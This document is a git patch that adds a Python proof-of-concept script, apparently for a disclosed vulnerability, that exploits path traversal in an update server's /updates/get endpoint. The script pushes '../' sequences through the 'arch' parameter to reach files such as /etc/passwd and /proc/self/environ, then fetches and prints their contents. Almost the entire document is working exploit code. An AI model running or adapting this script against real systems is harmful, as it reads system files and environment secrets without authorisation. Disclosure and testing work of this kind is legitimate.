From 055b27989c6d77b48dad0bf6f6ace6180c8a1351 Mon Sep 17 00:00:00 2001 From: hugy Date: Fri, 29 May 2026 07:10:03 +0000 Subject: [PATCH] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=B8=D1=82?= =?UTF-8?q?=D1=8C=20rosetta-sdu-2026-0000/poc2.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rosetta-sdu-2026-0000/poc2.py | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rosetta-sdu-2026-0000/poc2.py diff --git a/rosetta-sdu-2026-0000/poc2.py b/rosetta-sdu-2026-0000/poc2.py new file mode 100644 index 0000000..cf5511c --- /dev/null +++ b/rosetta-sdu-2026-0000/poc2.py @@ -0,0 +1,39 @@ +import sys +import json +from urllib.request import urlopen +from urllib.parse import urlencode +from urllib.error import URLError + +u = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080" +u = u.rstrip("/") +t = ["etc/hostname", "etc/passwd", "proc/1/cmdline", "proc/self/environ", "proc/cpuinfo"] + +for d in range(1, 11): + up = "/".join([".."] * d) + for f in t: + a = f"{up}/{f}" + params = urlencode({ + "platform": "android", + "arch": a, + "app": "1.0.0", + "kernel": "0.0.0" + }) + try: + r = urlopen(f"{u}/updates/get?{params}", timeout=5) + data = json.loads(r.read()) + except (URLError, ValueError): + continue + + k = data.get("kernelUpdateRequired") or data.get("kernel_update_required") + kurl = data.get("kernelUrl") or data.get("kernel_url") + if k and kurl and ".." in kurl: + print(f"Found: {kurl}") + try: + c = urlopen(u + kurl, timeout=5).read().decode("utf-8", errors="replace") + print(c[:1000]) + except URLError: + print("Download failed") + sys.exit(0) + +print("Not vulnerable") +sys.exit(1)